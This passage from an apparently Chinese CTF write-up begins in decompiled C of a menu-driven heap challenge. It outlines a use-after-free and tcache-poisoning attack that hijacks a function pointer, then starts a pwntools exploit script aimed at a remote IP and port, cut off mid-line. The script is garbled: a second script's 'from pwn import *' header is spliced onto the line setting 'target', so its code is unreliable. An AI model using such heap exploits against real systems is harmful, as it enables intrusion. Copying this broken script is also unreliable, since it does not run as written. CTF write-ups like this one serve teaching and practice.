class="cl"> <span class="o">&lt;&lt;</span> <span class="s">&#34; index=&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_end</span> <span class="o">-</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">worker_profiles_begin</span> <span class="o">-</span> <span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;autoscaler capacity reached&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">// 9 </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">dispatch_async_task</span><span class="p">(</span><span class="n">runtime_state</span> <span class="o">*</span><span class="n">state</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">task_id</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;queue.task_id&gt; &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cin</span> <span class="o">&gt;&gt;</span> <span class="n">task_id</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">task_id</span> <span class="o">&lt;=</span> <span class="mi">7</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">task_id</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">task_id</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">handler</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">task_id</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">handler</span> <span class="o">==</span> <span class="n">task_handler_xor_cookie</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">task_id</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">handler</span> <span class="o">==</span> <span class="n">task_handler_echo_descriptor</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">scheduler</span><span class="o">-&gt;</span><span class="n">strict_policy</span> <span class="o">==</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span> <span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">task_id</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">handler</span> <span class="o">==</span> <span class="n">task_handler_mul3</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="p">((</span><span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">))</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">task_id</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">handler</span><span class="p">)(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">task_desc</span><span class="p">[</span><span class="n">task_id</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;policy engine blocked non-whitelisted handler&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;task descriptor unavailable&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;task id invalid&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;scheduler offline&#34;</span> <span class="o">&lt;&lt;</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>好复杂的菜单题,,,</p> <h3 id="攻击思路-1">攻击思路 </h3><p>bootstrap_scheduler 用于初始化堆结构</p> <p>inspect_scheduler_queue 把需要 leak 的数据送到嘴边</p> <p>complete_batch_inference 函数有明显的 UAF 漏洞,对象为 <code>state-&gt;sessions[slot]</code></p> <p>patch_session_metadata 为 UAF 和 tcache poisoning 创造了极为有利的条件,可以说是刻意设计的</p> <p>provision_worker_profile 允许通过结构体重叠写入较多的数据</p> <p>dispatch_async_task 有函数指针的执行,注意到程序中已经有针对 flag 的读取行为,所以可以利用 provision_worker_profile 劫持该函数指针去跳转</p> <p>劫持函数指针之前需要将 strict_policy 设置为 0 ,而 provision_worker_profile 也可以做到这一点</p> <p>综上分析,直接打 tcache poisoning 即可</p> <h3 id="exp-1">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">os</span> <span class="o">=</span> <span class="s1">&#39;linux&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">file</span> <span class="o">=</span> <span class="s1">&#39;./pwn_patched&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">libcoffsetdict</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">libcrealdict</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">libcdict_add</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">addr</span> <span class="o">&gt;</span> <span class="mh">0x1000000</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">libcrealdict</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="n">addr</span> </span></span><span class="line"><span class="cl"> <span class="n">addr</span> <span class="o">%=</span> <span class="mh">0x1000</span> </span></span><span class="line"><span class="cl"> <span class="n">libcoffsetdict</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="n">addr</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">getlibc</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">libc</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">libcdb</span><span class="o">.</span><span class="n">search_by_symbol_offsets</span><span class="p">(</span><span class="n">libcoffsetdict</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">initlibc</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s1">&#39;cp&#39;</span><span class="p">,</span> <span class="n">libc</span><span class="o">.</span><span class="n">path</span><span class="p">,</span> <span class="s1">&#39;./libc.so.6&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s1">&#39;pwninit&#39;</span><span class="p">,</span> <span class="s1">&#39;--no-template&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s1">&#39;60.205.163.215&#39;</span><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">os</span> <span class="o">=</span> <span class="s1">&#39;linux&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">file</span> <span class="o">=</span> <span class="s1">&#39;./inference_forge_patched&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s1">&#39;60.205.163.215&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="mi">13774</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">p</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dbg</span><span class="p">(</span><span class="n">cmd</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">gdbscript</span> <span class="o">=</span> <span class="n">cmd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sa</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">rl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">itr</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">uu32</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u32</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uu64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u64</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uru64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">uu64</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="s1">&#39;</span><span class="se">\x7f</span><span class="s1">&#39;</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:])</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span> <span class="p">:</span><span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="n">name</span> <span class="o">+</span> <span class="s1">&#39; = &#39;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="n">name</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">safe_linking</span><span class="p">(</span><span class="n">pos</span><span class="p">,</span> <span class="n">val</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="n">pos</span> <span class="o">&gt;&gt;</span> <span class="mi">12</span><span class="p">)</span> <span class="o">^</span> <span class="n">val</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">bootstrap_scheduler</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;gateway&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">inspect_scheduler_queue</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;gateway&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;4&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">allocate_session_tensor</span><span class="p">(</span><span class="n">slot</span><span class="p">,</span> <span class="n">tensor_bytes</span><span class="p">,</span> <span class="n">alias</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;gateway&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;5&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;session.slot(0-15)&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">slot</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;session.tensor_bytes&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">tensor_bytes</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;session.alias&gt; &#39;</span><span class="p">,</span> <span class="n">alias</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">complete_batch_inference</span><span class="p">(</span><span class="n">slot</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;gateway&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;session.slot&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">slot</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">patch_session_metadata</span><span class="p">(</span><span class="n">slot</span><span class="p">,</span> <span class="n">qword_index</span><span class="p">,</span> <span class="n">qword_value</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;gateway&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;7&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;diag.session.slot&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">slot</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;diag.qword_index&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">qword_index</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;diag.qword_value(u64)&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">qword_value</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">provision_worker_profile</span><span class="p">(</span><span class="n">cpu_quota</span><span class="p">,</span> <span class="n">mem_quota</span><span class="p">,</span> <span class="n">io_weight</span><span class="p">,</span> <span class="n">latency_slo</span><span class="p">,</span> <span class="n">replicas</span><span class="p">,</span> <span class="n">region_code</span><span class="p">,</span> <span class="n">memo</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;gateway&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;8&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;worker.cpu_quota&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">cpu_quota</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;worker.mem_quota&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">mem_quota</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;worker.io_weight&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">io_weight</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;worker.latency_slo&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">latency_slo</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;worker.replicas&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">replicas</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;worker.region_code&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">region_code</span><span class="p">)</span><span class="o">.</span><span 